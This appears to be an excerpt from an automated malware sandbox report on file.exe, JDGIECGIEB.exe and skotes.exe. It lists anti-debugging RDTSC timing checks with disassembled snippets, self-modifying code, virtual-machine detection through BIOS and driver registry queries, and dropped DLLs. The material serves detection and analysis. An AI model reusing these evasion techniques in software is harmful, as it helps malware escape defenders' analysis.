Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D6CC second address: 35D6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361F92 second address: 361F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36152F second address: 361537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361537 second address: 361552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F44646ECA52h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361C5E second address: 361C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361C64 second address: 361C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA57h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361C86 second address: 361C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361DEB second address: 361E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA53h 0x00000007 jmp 00007F44646ECA4Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F44646ECA53h 0x00000014 jmp 00007F44646ECA4Fh 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363D7A second address: 363D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363D7E second address: 363D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363D82 second address: 363D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363E66 second address: 363E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363E70 second address: 363EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jno 00007F4465131BDBh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jnp 00007F4465131BD8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F4465131BC6h 0x00000021 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363EA6 second address: 363EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363EAA second address: 363ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4465131BDAh 0x00000012 jmp 00007F4465131BD4h 0x00000017 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363ED0 second address: 363F27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F44646ECA50h 0x0000000f call 00007F44646ECA49h 0x00000014 jmp 00007F44646ECA57h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F44646ECA4Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F27 second address: 363F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F2B second address: 363F44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA55h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F44 second address: 363F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F60 second address: 363F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F64 second address: 363F72 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F72 second address: 363FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F44646ECA4Ah 0x0000000f jnc 00007F44646ECA5Dh 0x00000015 jmp 00007F44646ECA57h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 pop eax 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36418A second address: 36418E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36418E second address: 364192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36433C second address: 364340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364340 second address: 364346 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364AD3 second address: 364ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364ADF second address: 364AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364C55 second address: 364C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364C59 second address: 364C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364F33 second address: 364F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 365109 second address: 36510F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36520E second address: 365214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 365214 second address: 365224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F44646ECA46h 0x00000010 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36562C second address: 365632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3656D3 second address: 3656E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F44646ECA46h 0x00000011 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3656E4 second address: 3656ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 365FE9 second address: 36604F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e movsx esi, di 0x00000011 mov esi, ecx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F44646ECA48h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f xor dword ptr [ebp+122D2FCDh], eax 0x00000035 push 00000000h 0x00000037 call 00007F44646ECA4Bh 0x0000003c call 00007F44646ECA4Bh 0x00000041 clc 0x00000042 pop edi 0x00000043 pop edi 0x00000044 mov di, cx 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a jne 00007F44646ECA4Ch 0x00000050 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36604F second address: 36607D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F4465131BD9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 ja 00007F4465131BC6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3679D0 second address: 367A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F44646ECA4Ch 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F44646ECA4Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F44646ECA51h 0x00000019 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 367A06 second address: 367A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 367A0A second address: 367A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a sbb si, A2E2h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+12448CA4h], eax 0x00000017 mov dword ptr [ebp+122D27A0h], ebx 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F44646ECA4Fh 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 367A3E second address: 367A48 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 369A18 second address: 369A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36A3F0 second address: 36A416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4465131BC6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4465131BD0h 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F4465131BC6h 0x0000001b rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36A416 second address: 36A4A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F44646ECA4Fh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F44646ECA48h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D1E6Ah] 0x00000032 mov edi, dword ptr [ebp+122D3015h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F44646ECA48h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov dword ptr [ebp+12442E01h], edi 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36A4A0 second address: 36A4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36683A second address: 36684A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jne 00007F44646ECA4Eh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36E8DC second address: 36E8E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36E8E2 second address: 36E938 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D38DEh] 0x00000015 je 00007F44646ECA47h 0x0000001b cld 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D3A9Ah] 0x00000024 push 00000000h 0x00000026 movsx edi, cx 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b jng 00007F44646ECA48h 0x00000031 push ebx 0x00000032 pop ebx 0x00000033 push eax 0x00000034 jmp 00007F44646ECA50h 0x00000039 pop eax 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F44646ECA4Ch 0x00000044 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36F7FE second address: 36F861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F4465131BC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F4465131BC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov edi, ebx 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+122D36F5h] 0x00000037 xchg eax, esi 0x00000038 jmp 00007F4465131BCBh 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F4465131BD2h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3706EB second address: 3706EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3706EF second address: 37077A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4465131BD9h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F4465131BC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+1246E408h] 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D351Eh], edi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F4465131BC8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov dword ptr [ebp+122D1DBAh], ecx 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f pushad 0x00000060 jc 00007F4465131BC6h 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3727B4 second address: 3727E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007F44646ECA66h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F44646ECA58h 0x00000019 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 37385E second address: 373862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 373862 second address: 373868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 378B55 second address: 378B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 37B95F second address: 37B966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 37DF75 second address: 37DF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36CB73 second address: 36CB80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36CB80 second address: 36CB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36EB42 second address: 36EB4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36EB4F second address: 36EB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 371836 second address: 371840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 370A17 second address: 370A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F4465131BC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F4465131BC8h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 371840 second address: 371844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 371844 second address: 37186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F4465131BEBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4465131BD9h 0x00000016 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 37186E second address: 371872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 373A0D second address: 373A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 373A11 second address: 373A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 375A78 second address: 375A93 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4465131BCFh 0x00000011 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 379BC5 second address: 379BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 375A93 second address: 375A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 379BCB second address: 379BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 85FC98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A06BC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 85D17A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A0FBB9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A8EFC1 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Special instruction interceptor: First address: 1BECE9 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Special instruction interceptor: First address: 35BEA7 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Special instruction interceptor: First address: 37DFC2 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Special instruction interceptor: First address: 3E6BB1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 61ECE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7BBEA7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7DDFC2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 846BB1 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Documents\JDGIECGIEB.exe

Code function: 16_2_04B20CA1 rdtsc

16_2_04B20CA1

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
